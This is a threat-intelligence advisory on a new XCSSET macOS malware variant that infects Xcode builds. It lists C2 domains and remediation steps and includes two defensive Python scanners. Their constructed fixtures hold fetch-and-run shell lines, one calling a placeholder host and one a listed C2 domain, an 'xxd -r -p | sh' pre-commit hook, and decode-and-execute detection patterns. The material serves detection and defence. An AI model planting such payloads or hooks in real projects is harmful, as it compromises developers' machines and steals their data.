Severity
High
Analysis Summary
Threat Intelligence has identified a new variant of the XCSSET macOS malware, marking its first known resurgence since 2022. This sophisticated malware targets developers by infecting Xcode projects, allowing it to execute malicious payloads when the project is built. The updated variant features enhanced obfuscation, advanced persistence techniques, and new infection methods aimed at stealing sensitive information. By leveraging shared project files among macOS developers, XCSSET spreads stealthily, making detection challenging. It employs scripting languages, UNIX commands, and legitimate macOS binaries to remain fileless and avoid detection while executing its malicious operations.
According to the researchers, the malware’s modular architecture includes heavily encoded payloads, improved error handling, and randomized code generation techniques to evade static analysis. Unlike earlier versions, which relied solely on xxd (hexdump) for encoding, the latest variant incorporates Base64 encoding. The infection process consists of four stages, beginning with an obfuscated shell payload that is executed when a compromised Xcode project is built. This payload undergoes multiple layers of hex decoding before execution, ultimately leading to the download of additional modules from a command-and-control (C2) server. These modules are designed to extract system information, browser extension data, digital wallets, and notes stored on infected macOS devices.
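The staged, self-decoding build-phase payload described above is what a reviewer of a shared Xcode project needs to find before building it. The script below is an added example, not code from the advisory or from Microsoft: it extracts the `shellScript` value of every PBXShellScriptBuildPhase in a project.pbxproj, statically peels hex (xxd-style) and Base64 layers without executing anything, and reports decode-and-execute indicators. The pbxproj regex, the indicator list, the `c2-placeholder.example` host and the sample project text are this example's own constructed assumptions.

```python
"""Static triage of the shell-script build phases in an Xcode project.pbxproj.

Added example (not the advisory's or Microsoft's code). Nothing is executed:
each encoded layer is decoded as text and scanned again. Heuristics and the
sample project below are constructed for illustration.
"""
from __future__ import annotations

import base64
import binascii
import re

# pbxproj stores each phase script as one quoted string with C-style escapes.
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
_ESCAPES = {"n": "\n", "t": "\t"}

# Defender-side indicators of a self-decoding payload (heuristics, not signatures).
INDICATORS = {
    "xxd_decode": re.compile(r"\bxxd\s+-r"),
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "eval": re.compile(r"\beval\b"),
    "pipe_to_shell": re.compile(r"\|\s*(?:ba|z)?sh\b"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
}
HEX_BLOB_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}){32,}\b")   # >= 64 hex digits
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")       # >= 40 Base64 chars


def unescape_pbx(s: str) -> str:
    """Undo pbxproj escaping: \\n and \\t become control chars, \\x becomes x."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def extract_shell_scripts(pbxproj: str) -> list[str]:
    """Return every build-phase script in the project file, unescaped."""
    return [unescape_pbx(m) for m in SHELL_SCRIPT_RE.findall(pbxproj)]


def _decode_one_layer(text: str) -> str | None:
    """Decode the longest hex blob, else the longest decodable Base64 blob."""
    for blob in sorted(HEX_BLOB_RE.findall(text), key=len, reverse=True):
        try:
            return binascii.unhexlify(blob).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    for blob in sorted(B64_BLOB_RE.findall(text), key=len, reverse=True):
        try:
            return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    return None


def peel_layers(script: str, max_depth: int = 5) -> list[str]:
    """Return [script, layer1, layer2, ...], each the decoded blob of the previous."""
    layers = [script]
    while len(layers) <= max_depth:
        nxt = _decode_one_layer(layers[-1])
        if nxt is None or nxt in layers:
            break
        layers.append(nxt)
    return layers


def find_indicators(script: str) -> list[str]:
    """Run every indicator over every peeled layer of one script."""
    layers = peel_layers(script)
    hits = {"encoded_layer"} if len(layers) > 1 else set()
    for layer in layers:
        hits.update(name for name, rx in INDICATORS.items() if rx.search(layer))
    return sorted(hits)


def scan_pbxproj(pbxproj: str) -> list[dict]:
    """One record per build phase: script preview, layer count, indicators."""
    return [{"preview": s[:48], "layers": len(peel_layers(s)), "indicators": find_indicators(s)}
            for s in extract_shell_scripts(pbxproj)]


def build_sample_pbxproj() -> str:
    """Constructed fixture: a benign lint phase plus an XCSSET-style phase whose
    hex layer hides a Base64 layer that hides a fetch-and-run (placeholder host)."""
    inner = "curl -fsSL http://c2-placeholder.example/stage2 | sh"
    layer1 = f"echo {base64.b64encode(inner.encode()).decode()} | base64 -d | sh"
    top = f"echo {binascii.hexlify(layer1.encode()).decode()} | xxd -r -p | sh"
    benign = 'echo \\"Build started\\"\\n/usr/local/bin/swiftlint --quiet'
    phase = "\t{id} = {{\n\t\tisa = PBXShellScriptBuildPhase;\n\t\tshellPath = /bin/sh;\n\t\tshellScript = \"{s}\";\n\t}};\n"
    return ("/* Begin PBXShellScriptBuildPhase section */\n"
            + phase.format(id="AAA1", s=benign) + phase.format(id="AAA2", s=top)
            + "/* End PBXShellScriptBuildPhase section */\n")


if __name__ == "__main__":
    for record in scan_pbxproj(build_sample_pbxproj()):
        print(record)
```

Run it against a real project with `scan_pbxproj(open("X.xcodeproj/project.pbxproj").read())`. A phase that reports `encoded_layer` together with `pipe_to_shell` or `eval` deserves a manual read before the project is built; a lint or code-generation phase normally reports nothing.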
XCSSET achieves persistence through multiple methods, ensuring the malware remains active even after reboots. One technique involves modifying the ~/.zshrc file to execute malicious code whenever a new shell session starts. Another method creates a fake Launchpad application that launches the malware when the user tries to open the legitimate Launchpad. Additionally, XCSSET targets Git repositories by modifying pre-commit hooks to execute its payload whenever a developer commits changes. These persistence strategies demonstrate the malware’s adaptability and ability to blend into regular macOS operations, further complicating detection and removal.
Microsoft advises macOS users, particularly developers, to implement strict security measures, including keeping their systems up to date, thoroughly inspecting Xcode projects for anomalies, and using security solutions like Microsoft Defender for Endpoint on Mac. These precautions can help identify and mitigate threats posed by XCSSET and similar malware. As this variant continues to evolve, proactive monitoring and security awareness remain critical in defending against these sophisticated attacks.
Impact
- Data Breaches
- Unauthorized Access
- Financial Loss
Indicators of Compromise
Domain Name
bulknames.ru
castlenet.ru
chaoping.ru
devapple.ru
gigacells.ru
gizmodoc.ru
trixmate.ru
itoyads.ru
rigglejoy.ru
figmasol.ru
vivatads.ru
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Ensure that your operating system and development tools are always up to date to mitigate known vulnerabilities.
- Carefully inspect any external or shared Xcode projects before building them to prevent executing malicious code.
- Deploy security tools like Microsoft Defender for Endpoint on Mac or other reputable antivirus solutions to detect and block XCSSET malware.
- Regularly check pre-commit hooks and repository files for unauthorized modifications that may indicate infection.
- Inspect files like ~/.zshrc and ~/.zshrc_aliases for unauthorized changes that may indicate malware persistence.
- Do not execute shell scripts from unknown sources, especially those embedded within development environments.
- Verify system applications such as Launchpad to ensure they have not been replaced with malicious versions.
- Limit permissions for running scripts and unauthorized execution of UNIX commands.
- Consider using virtual machines or isolated environments when working with external Xcode projects.
- Keep macOS security features like SIP enabled to prevent unauthorized system modifications.
- Monitor outgoing network connections for suspicious activity, particularly unexpected communications with external servers.
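The persistence locations named in the summary and in the remediation list (~/.zshrc and ~/.zshrc_aliases, Git pre-commit hooks, a replaced Launchpad) can be swept with one script. The following is an added example, not tooling from the advisory or from Microsoft: it matches file contents against the C2 domains listed under Indicators of Compromise plus generic decode-and-execute patterns, reports every pre-commit hook under a source tree, and flags any Launchpad.app outside the system location. The genuine Launchpad path, the pattern set and the sample directory tree are this example's assumptions; the tree is constructed in a temporary directory so the script runs offline.

```python
"""Hunt for the XCSSET persistence artifacts named in the advisory.

Added example (not the advisory's or Microsoft's tooling). Paths are
parameters, so it runs against a constructed tree here and against
Path.home() plus a source root on a real host.
"""
from __future__ import annotations

import json
import os
import re
import stat
import tempfile
from pathlib import Path

# Domains from the advisory's Indicators of Compromise section.
IOC_DOMAINS = ["bulknames.ru", "castlenet.ru", "chaoping.ru", "devapple.ru",
               "gigacells.ru", "gizmodoc.ru", "trixmate.ru", "itoyads.ru",
               "rigglejoy.ru", "figmasol.ru", "vivatads.ru"]
DOMAIN_RE = re.compile("|".join(re.escape(d) for d in IOC_DOMAINS), re.I)
# Generic "decode something and run it" shapes of the staged payload (heuristic).
DECODE_EXEC_RE = re.compile(r"xxd\s+-r|base64\s+(?:-d|-D|--decode)|\beval\b|\|\s*(?:ba|z)?sh\b")

STARTUP_FILES = [".zshrc", ".zshrc_aliases"]
# Assumption: where the genuine Launchpad lives on current macOS releases.
GENUINE_LAUNCHPAD = Path("/System/Applications/Launchpad.app")


def suspicious_lines(path: Path) -> list[tuple[int, str, str]]:
    """Return (line_no, reason, line) for lines matching an IOC domain or decode pattern."""
    findings = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    for no, line in enumerate(text.splitlines(), 1):
        if DOMAIN_RE.search(line):
            findings.append((no, "ioc_domain", line.strip()))
        elif DECODE_EXEC_RE.search(line):
            findings.append((no, "decode_exec", line.strip()))
    return findings


def check_startup_files(home: Path) -> dict[str, list]:
    """Scan the shell start-up files XCSSET modifies for persistence."""
    return {n: suspicious_lines(home / n) for n in STARTUP_FILES if (home / n).exists()}


def check_precommit_hooks(root: Path) -> dict[str, dict]:
    """Report every .git/hooks/pre-commit under root: executable bit and findings."""
    results = {}
    for dirpath, dirnames, _ in os.walk(root):
        if os.path.basename(dirpath) == ".git":
            dirnames[:] = []  # do not descend into .git internals
            hook = Path(dirpath) / "hooks" / "pre-commit"
            if hook.is_file():
                results[str(hook)] = {
                    "executable": bool(hook.stat().st_mode & stat.S_IXUSR),
                    "findings": suspicious_lines(hook),
                }
    return results


def check_launchpad(app_dirs: list[Path]) -> list[str]:
    """Any Launchpad.app outside the system location is a candidate decoy."""
    return [str(d / "Launchpad.app") for d in app_dirs
            if (d / "Launchpad.app").exists()
            and (d / "Launchpad.app").resolve() != GENUINE_LAUNCHPAD]


def hunt(home: Path, source_root: Path, app_dirs: list[Path]) -> dict:
    return {"startup_files": check_startup_files(home),
            "precommit_hooks": check_precommit_hooks(source_root),
            "launchpad": check_launchpad(app_dirs)}


def build_sample_tree(base: Path) -> None:
    """Constructed fixture: one tampered .zshrc, one clean alias file, a clean and
    an infected repository hook, and a decoy Launchpad.app in a user app folder."""
    home = base / "home"
    home.mkdir()
    (home / ".zshrc").write_text('export PATH="$HOME/bin:$PATH"\n'
                                 "alias gs='git status'\n"
                                 "# constructed line mimicking the start-up persistence:\n"
                                 'eval "$(curl -fsSL https://gizmodoc.ru/PLACEHOLDER)"\n')
    (home / ".zshrc_aliases").write_text("alias ll='ls -la'\n")
    for name, body in {"clean-repo": "#!/bin/sh\nexec swiftlint --quiet\n",
                       "infected-repo": "#!/bin/sh\necho 6869 | xxd -r -p | sh\n"}.items():
        hooks = base / "src" / name / ".git" / "hooks"
        hooks.mkdir(parents=True)
        (hooks / "pre-commit").write_text(body)
        (hooks / "pre-commit").chmod(0o755)
    (base / "apps" / "Launchpad.app" / "Contents").mkdir(parents=True)  # decoy
    (base / "apps-empty").mkdir()


def demo() -> dict:
    """Build the constructed tree in a temp dir, hunt it, return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        build_sample_tree(base)
        return hunt(base / "home", base / "src", [base / "apps", base / "apps-empty"])


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a workstation, call `hunt(Path.home(), Path.home() / "src", [Path("/Applications"), Path.home() / "Applications"])` and review every reported hook, not only the flagged ones: a pre-commit hook a developer did not install is itself the finding, whatever its content. Pair the file sweep with the outbound-connection monitoring recommended above, since a payload already running in memory leaves nothing for the file checks to find.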